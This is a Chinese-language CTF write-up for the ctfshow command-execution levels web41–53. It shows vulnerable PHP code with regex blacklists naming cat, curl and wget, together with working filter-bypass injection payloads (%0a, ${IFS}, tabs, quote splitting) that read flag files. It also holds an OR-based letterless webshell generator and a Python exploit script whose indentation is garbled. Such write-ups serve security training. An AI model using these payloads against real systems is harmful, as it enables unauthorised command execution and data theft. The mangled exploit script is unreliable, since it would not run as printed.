2. 程式人生 > 其它 >ctfshow-命令執行[41-53]

ctfshow-命令執行[41-53]

阿新 發佈:2022-03-13

web41 無數字和字元

<?php
  
  /*
  # -*- coding: utf-8 -*-
  # @Author: 羽
  # @Date:   2020-09-05 20:31:22
  # @Last Modified by:   h1xa
  # @Last Modified time: 2020-09-05 22:40:07
  # @email: [email protected]
  # @link: https://ctf.show
  
  */
  
  if(isset($_POST['c'])){
    $c = $_POST['c'];
    if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
      eval("echo($c);");
    }
  }else{
    highlight_file(__FILE__);
  }
?>

過濾了數字和字母和$、+、-、^、~ 但保留了 |

說明可以使用或用算 原理:不包含數字和字母的webshell

直接上指令碼

先使用php指令碼異或出可用的字元:

<?php
$myfile = fopen("rce_or.txt", "w");
$contents="";
for ($i=0; $i < 256; $i++) { 
	for ($j=0; $j <256 ; $j++) { 

		if($i<16){
			$hex_i='0'.dechex($i);
		}
		else{
			$hex_i=dechex($i);
		}
		if($j<16){
			$hex_j='0'.dechex($j);
		}
		else{
			$hex_j=dechex($j);
		}
		$preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i';
		if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){
					echo "";
    }
  
		else{
		$a='%'.$hex_i;
		$b='%'.$hex_j;
		$c=(urldecode($a)|urldecode($b));
		if (ord($c)>=32&ord($c)<=126) {
			$contents=$contents.$c." ".$a." ".$b."\n";
		}
	}

}
}
fwrite($myfile,$contents);
fclose($myfile);

得到異或的結果後,執行py指令碼

# -*- coding: utf-8 -*-
import requests
import urllib
from sys import *
import os

if(len(argv)!=2):
    print("="*50)
    print('USER:python exp.py <url>')
    print("eg:  python exp.py http://ctf.show/")
    print("="*50)
    exit(0)
    url=argv[1]
    def action(arg):
        s1=""
        s2=""
        for i in arg:
            f=open("rce_or.txt","r")
            while True:
                t=f.readline()
                if t=="":
                    break
                    if t[0]==i:
                        #print(i)
                        s1+=t[2:5]
                        s2+=t[6:9]
                        break
                        f.close()
                        output="(\""+s1+"\"|\""+s2+"\")"
                        return(output)
                    
                    while True:
                        param=action(input("\n[+] your function:") )+action(input("[+] your command:"))
                        data={
                            'c':urllib.parse.unquote(param)
                        }
                        r=requests.post(url,data=data)
   print("\n[*] result:\n"+r.text)

web42 黑洞

<?php
  
  /*
  # -*- coding: utf-8 -*-
  # @Author: h1xa
  # @Date:   2020-09-05 20:49:30
  # @Last Modified by:   h1xa
  # @Last Modified time: 2020-09-05 20:51:55
  # @email: [email protected]
  # @link: https://ctfer.com
  
  */
  
  
  if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");//作用是不顯示結果
  }else{
    highlight_file(__FILE__);
}

/dev/null:表示 的是一個黑洞,通常用於丟棄不需要的資料輸出, 或者用於輸入流的空檔案

解法:

  1. 後面加;

payload:?c=cp flag.php 1.txt;

  1. 後面加%0a

payload:?c=cp flag.php 1.txt%0a

web43

<?php
  
  /*
  # -*- coding: utf-8 -*-
  # @Author: h1xa
  # @Date:   2020-09-05 20:49:30
  # @Last Modified by:   h1xa
  # @Last Modified time: 2020-09-05 21:32:51
  # @email: [email protected]
  # @link: https://ctfer.com
  
  */
  
  
  if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat/i", $c)){
      system($c." >/dev/null 2>&1");
    }
  }else{
    highlight_file(__FILE__);
}

黑洞+過濾了;和大小寫的cat

payload:?c=tac f*%0a

web44

<?php
  
  /*
  # -*- coding: utf-8 -*-
  # @Author: h1xa
  # @Date:   2020-09-05 20:49:30
  # @Last Modified by:   h1xa
  # @Last Modified time: 2020-09-05 21:32:01
  # @email: [email protected]
  # @link: https://ctfer.com
  
  */
  
  
  if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|cat|flag/i", $c)){
      system($c." >/dev/null 2>&1");
    }
  }else{
    highlight_file(__FILE__);
}

黑洞加上過濾了; cat flag

payload:?c=tac f*%0a

web45

<?php
  
  /*
  # -*- coding: utf-8 -*-
  # @Author: h1xa
  # @Date:   2020-09-05 20:49:30
  # @Last Modified by:   h1xa
  # @Last Modified time: 2020-09-05 21:35:34
  # @email: [email protected]
  # @link: https://ctfer.com
  
  */
  
  
  if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| /i", $c)){
      system($c." >/dev/null 2>&1");
    }
  }else{
    highlight_file(__FILE__);
}

比上一題多過濾了一個空格

空格代替:

  • ${IFS}

  • ${IFS}$1

  • $IFS$1

  • <>

  • <

  • %09(需要PHP環境)

cat代替:

tac、nl、more、tail、sort、less、head等

payload:?c=tac%09f*%0a

web46

<?php
  
  /*
  # -*- coding: utf-8 -*-
  # @Author: h1xa
  # @Date:   2020-09-05 20:49:30
  # @Last Modified by:   h1xa
  # @Last Modified time: 2020-09-05 21:50:19
  # @email: [email protected]
  # @link: https://ctfer.com
  
  */
  
  
  if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
      system($c." >/dev/null 2>&1");
    }
  }else{
    highlight_file(__FILE__);
}

過濾了分號、flag、空格、數字、$、星號

payload:

?c=tac%09fla?.php%0a

web47

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:59:23
# @email: [email protected]
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

payload同上一題

web48

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:06:20
# @email: [email protected]
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

payload同上一題

web49

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:22:43
# @email: [email protected]
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

同上一題payload

web50

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:32:47
# @email: [email protected]
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

%09%26都無了 空格使用其他繞過,&也可以換其他繞過

此時使用帶行號讀nl nl不支援萬用字元 ,那麼可以使用php特性,字串之間有兩個''分隔,可以自動忽略

payload:?c=nl<fla''g.php%0a

web51

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:42:52
# @email: [email protected]
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

同上一題payload

web52

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:50:30
# @email: [email protected]
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

多過濾了大小於號

payload:?c=nl${IFS}fla''g.php%0a

得到虛假的flag

說明其他目錄下可能存在著flag,

檢視當前目錄:pwd

/var/www/html

通過../不斷返回上一級目錄檢視?c=ls$IFS/../../%0a

存在flag

讀取

。。。。莫名其妙

換一下思路嘗試一下mv

?c=cp${IFS}/fla?${IFS}/var/www/html/a.tx

檢視是否複製成功

訪問成功

前面的問題重啟環境即可解決

web53

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 18:21:02
# @email: [email protected]
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
        echo($c);
        $d = system($c);
        echo "<br>".$d;
    }else{
        echo 'no';
    }
}else{
    highlight_file(__FILE__);
}

payload:?c=nl${IFS}fla''g.php%0a

相關推薦

ctfshow-命令執行[41-53]

web41無數字和字元 <?php /* # -*- coding: utf-8 -*- # @Author: 羽 # @Date:2020-09-05 20:31:22 # @Last Modified by:h1xa

ctf_show-web入門-命令執行(42-53)

WEB42 >是寫入 而1和2意思百度一下: 那麼就是不管標準輸出還是錯誤輸出都輸入到null裡銷燬

CTFShow-Web入門-命令執行 29-36

web29 error_reporting(0); if(isset($_GET[\'c\'])){ $c = $_GET[\'c\']; if(!preg_match(\"/flag/i\", $c)){ eval($c);

CTFShow-Web入門-命令執行 37-49

data:// 用法:data://text/plain;base64, web37 error_reporting(0); if(isset($_GET[\'c\'])){ $c = $_GET[\'c\'];

ctfshow Web入門 40 - 命令執行(10)

題目過濾如下: 先檢視當前目錄下面有啥檔案 參考了羽大佬的WP:https://blog.csdn.net/miuzzx/article/details/108415301

CTFShow-Web入門-命令執行 71-74

web71 payload:c=include(\"/flag.txt\");exit(); 執行完前面的包含語句後會強制退出,不會執行後面的語句

ctfshow web入門 - 命令執行(50)

if(isset($_GET[\'c\'])){ $c=$_GET[\'c\']; if(!preg_match(\"/\\;|cat|flag| |[0-9]|\\\\$|\\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\\`|\\%|\\x09|\\x26/i\", $c)){

ctfshow WEB入門 命令執行 web29-web122

web29 題目原始碼: if(isset($_GET[\'c\'])){ $c = $_GET[\'c\']; if(!preg_match(\"/flag/i\", $c)){ eval($c);

ctfshow-web入門命令執行-web40/web41(附python指令碼)

web40 別看這裡過濾了這麼多,其實他過濾的括號是中文括號,這裡我開始納悶了好久

ctfshow web入門 命令執行

web32 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date:2020-09-04 00:12:34 # @Last Modified by:h1xa

ctfshow-web命令執行(web45-59)(Updating)

PHP是世界上最好的語言! ctfshow-web命令執行(web45-59)(Updating) 目錄web45 &&等於; tab等於spaceweb46 過濾數字*$web47 <等於空格 ||解決黑洞web48 沒什麼軟用

Redis 命令執行過程(上)

今天我們來瞭解一下 Redis 命令執行的過程。在之前的文章中《當 Redis 發生高延遲時,到底發生了什麼》我們曾簡單的描述了一條命令執行過程,本篇文章展示深入說明一下,加深讀者對 Redis 的瞭解。

Hystrix命令執行流程

前言 Hystrix已經不在維護了,但是成功的開源專案總是值得學習的.剛開始看 Hystrix 原始碼時,會發現一堆 Action,Function 的邏輯,這其實就是 RxJava 的特點了--響應式程式設計.上篇文章已經對RxJava作過入門介紹,不熟

java命令執行jar包的多種方法(四種方法)

大家都知道一個java應用專案可以打包成一個jar,當然你必須指定一個擁有main函式的main class作為你這個jar包的程式入口。

命令執行繞過小技巧

管道符 windows 下 直接執行後面的語句 如果前面命令是錯的那麼就執行後面的語句,否則只執行前面的語句

C# 動態輸出Dos命令執行結果的例項(附原始碼)

本文以一個簡單的小例子講解如何將命令列資訊實時的輸出到文字框中。僅供學習分享使用,如有不足之處,還請指正。

高階Linux運維工程師養成記-Linux命令執行過程和命令型別

高階Linux運維工程師養成記-Linux命令執行過程和命令型別高階Linux運維工程師養成記

總結一下程式碼執行命令執行

一.程式碼執行 1.常見的執行函式 (1).eval()將字串當作函式執行 1 <?php 2 eval (echo \"hello\";);

命令執行漏洞利用及繞過方式總結

命令注入常見的方法 1.常見管道符   Windows系統支援的管道符   Linux系統支援的管道符

Shell指令碼中$0、$?、$!、$$、$*、$#、$@等的意義以及linux命令執行返回值代表意義

Shell指令碼中$0、$?、$!、$$、$*、$#、$@等的意義以及linux命令執行返回值意義 (1) Shell指令碼中$0、$?、$!、$$、$*、$#、$@等的意義說明